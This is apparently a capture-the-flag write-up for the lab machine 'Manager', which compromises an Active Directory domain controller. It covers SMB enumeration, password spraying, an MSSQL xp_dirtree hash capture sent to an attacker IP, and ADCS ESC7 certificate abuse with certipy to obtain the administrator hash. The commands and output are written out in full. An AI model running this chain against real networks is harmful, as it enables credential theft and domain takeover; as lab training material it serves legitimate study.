Manager
Recon
DNS (53)
└─$ dig ANY manager.htb @10.129.251.108 +tcp | grep -vE ';|^$'
manager.htb. 600 IN A 10.129.251.108
manager.htb. 600 IN A 10.10.11.236
manager.htb. 3600 IN NS dc01.manager.htb.
manager.htb. 3600 IN SOA dc01.manager.htb. hostmaster.manager.htb. 247 900 600 86400 3600
dc01.manager.htb. 3600 IN A 10.129.251.108HTTP (80)
The site is serving static html, no subdomain was found with ffuf
└─$ domain='manager.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl 507SMB
└─$ netexec smb manager.htb -u '' -p '' --shares
SMB 10.129.251.108 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.251.108 445 DC01 [+] manager.htb\:
SMB 10.129.251.108 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
└─$ netexec smb manager.htb -u 'anonymous' -p '' --shares
SMB 10.129.251.108 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.251.108 445 DC01 [+] manager.htb\anonymous:
SMB 10.129.251.108 445 DC01 [*] Enumerated shares
SMB 10.129.251.108 445 DC01 Share Permissions Remark
SMB 10.129.251.108 445 DC01 ----- ----------- ------
SMB 10.129.251.108 445 DC01 ADMIN$ Remote Admin
SMB 10.129.251.108 445 DC01 C$ Default share
SMB 10.129.251.108 445 DC01 IPC$ READ Remote IPC
SMB 10.129.251.108 445 DC01 NETLOGON Logon server share
SMB 10.129.251.108 445 DC01 SYSVOL Logon server share
└─$ netexec smb manager.htb -u 'anonymous' -p '' --rid-brute | tee users_rid.log
SMB 10.129.251.108 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.251.108 445 DC01 [+] manager.htb\anonymous:
SMB 10.129.251.108 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.129.251.108 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.129.251.108 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.129.251.108 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.129.251.108 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.129.251.108 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.129.251.108 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.251.108 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.129.251.108 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.251.108 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.251.108 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.251.108 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.129.251.108 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.129.251.108 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.251.108 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.129.251.108 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.129.251.108 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.129.251.108 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.129.251.108 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.129.251.108 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.129.251.108 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.129.251.108 445 DC01 1119: MANAGER\Operator (SidTypeUser)
└─$ grep SidTypeUser users_rid.log | awk '{split($6, a, "\\"); print(a[2])}' | tee users.txt
Administrator
Guest
krbtgt
DC01$
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
OperatorBruteforce the passwords with usernames
└─$ cat users.txt | tr 'A-Z' 'a-z' >> users.txt
└─$ netexec smb manager.htb -u users.txt -p users.txt --no-bruteforce
SMB 10.129.251.108 445 DC01 [+] manager.htb\operator:operatorEnumerate DC
└─$ faketime -f +7h cicada-mastertul -t '10.129.251.108' -u 'operator' -p 'operator' -d 'manager.htb'
[!x!] Scanning 10.129.251.108
[!] Enumerating SMB...
netexec smb 10.129.251.108 -u 'operator' -p 'operator' --shares
[-] Could not connect to SMB
[!] Connecting to WinRM...
netexec winrm 10.129.251.108 -u 'operator' -p 'operator'
[-] Could not connect to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/ldap_results
[!x!] Cleaning up...
Raven can winrm in to the machine, so the account is desired target.
MSSQL
Bloodhound didn't show any outbound permissions, but we have access to MSSQL
└─$ netexec mssql 10.129.251.108 -u 'operator' -p 'operator'
MSSQL 10.129.251.108 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.129.251.108 1433 DC01 [+] manager.htb\operator:operatorCommand execution is disabled
└─$ netexec mssql 10.129.251.108 -u 'operator' -p 'operator' -M mssql_priv -o ACTION=privesc
MSSQL 10.129.251.108 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.129.251.108 1433 DC01 [+] manager.htb\operator:operator
MSSQL_PRIV 10.129.251.108 1433 DC01 [+] MANAGER\Operator is sysadmin
MSSQL_PRIV 10.129.251.108 1433 DC01 [+] MANAGER\Operator is now a sysadmin! (Pwn3d!)
└─$ netexec mssql 10.129.251.108 -u 'operator' -p 'operator' -x whoami
MSSQL 10.129.251.108 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.129.251.108 1433 DC01 [+] manager.htb\operator:operatorHash caught by responder is not crackable
└─$ sudo responder -I tun0
---
└─$ impacket-mssqlclient 'MANAGER.HTB'/'operator':'operator'@'10.129.251.108' -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
SQL (MANAGER\Operator guest@master)> xp_dirtree \\10.10.14.113\x
...
[SMB] NTLMv2-SSP Client : 10.129.251.108
[SMB] NTLMv2-SSP Username : MANAGER\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MANAGER:1298c7446bb71623:7E834EEFE336C155DB7EE552CBE76A41:010100000000000000DB934E5E48DB01AA71E8B1321E2B79000000000200080048004A005400560001001E00570049004E002D004100560045005600520034005900450056005000480004003400570049004E002D00410056004500560052003400590045005600500048002E0048004A00540056002E004C004F00430041004C000300140048004A00540056002E004C004F00430041004C000500140048004A00540056002E004C004F00430041004C000700080000DB934E5E48DB0106000400020000000800300030000000000000000000000000300000D167A1BC4215133E40EB79E0D32D161C6C1A5048EBEB9A1A819856EC8041ACCA0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310033000000000000000000
[+] Exiting...We became sysadmin by netexec, but still no permissions to enable xp_cmdshell
SQL (MANAGER\Operator guest@master)> enable_xp_cmdshell
ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.Enumerate with xp_dirtree
SQL (MANAGER\Operator guest@master)> xp_dirtree \inetpub\wwwroot
[%] exec master.sys.xp_dirtree '\inetpub\wwwroot',1,1
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1We can download the backup file available on webserver.
└─$ curl -LOs 'http://10.129.251.108/website-backup-27-07-23-old.zip'
└─$ unzip website-backup-27-07-23-old.zip -d backup
Creds:
raven:R4v3nBe5tD3veloP3r!123
WinRM
└─$ evil-winrm -i manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
*Evil-WinRM* PS C:\Users\Raven\Documents> whoami /all
User Name SID
============= ==============================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledUser.txt
*Evil-WinRM* PS C:\Users\Raven\Documents> cat ../Desktop/user.txt
00ea5f4486bf2455ff7c7f0a69cd3308Privilege Escalation
Still nothing from Bloodhound
└─$ faketime -f +7h bloodhound-python -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -d 'manager.htb' -c All -ns 10.129.251.108 -dc dc01.manager.htb --zip -op raven
Enumerate certificates on DC
└─$ certipy-ad find -vulnerable -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templateshttps://github.com/ly4k/Certipy?tab=readme-ov-file#esc7https://www.thehacker.recipes/ad/movement/adcs/access-controls#certificate-authority-esc7
└─$ USER='raven'
PASSWORD='R4v3nBe5tD3veloP3r!123'
DOMAIN='manager.htb'
TEMPLATE='manager-DC01-CA'
└─$ ccertipy-ad ca -ca "$TEMPLATE" -add-officer "$USER" -username "$USER@$DOMAIN" -password "$PASSWORD"
certipy-ad ca -ca "$TEMPLATE" -enable-template "SubCA" -username "$USER@$DOMAIN" -password "$PASSWORD"
certipy-ad req -username "$USER@$DOMAIN" -password "$PASSWORD" -ca "$TEMPLATE" -target "$DOMAIN" -template "SubCA" -upn "administrator@$DOMAIN"
certipy-ad ca -ca "$TEMPLATE" -issue-request 21 -username "$USER@$DOMAIN" -password "$PASSWORD"
certipy-ad req -username "$USER@$DOMAIN" -password "$PASSWORD" -ca "$TEMPLATE" -target "$DOMAIN" -retrieve 21
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 21
Would you like to save the private key? (y/N) y
[*] Saved private key to 21.key
[-] Failed to request certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 21
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '21.key'
[*] Saved certificate and private key to 'administrator.pfx'Get the NTLM hash for user and fix clock skew
└─$ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
└─$ sudo ntpdate manager.htb
2024-12-07 11:56:44.712756 (-0500) +25198.083861 +/- 0.040104 manager.htb 10.129.251.108 s1 no-leap
CLOCK: time stepped by 25198.083861
└─$ echo $(( 25198.083861 / 3600 ))
6.9994677391666666
└─$ faketime -f +7h certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924efRoot.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
57e674457bce72947459f144c4987aa3Last updated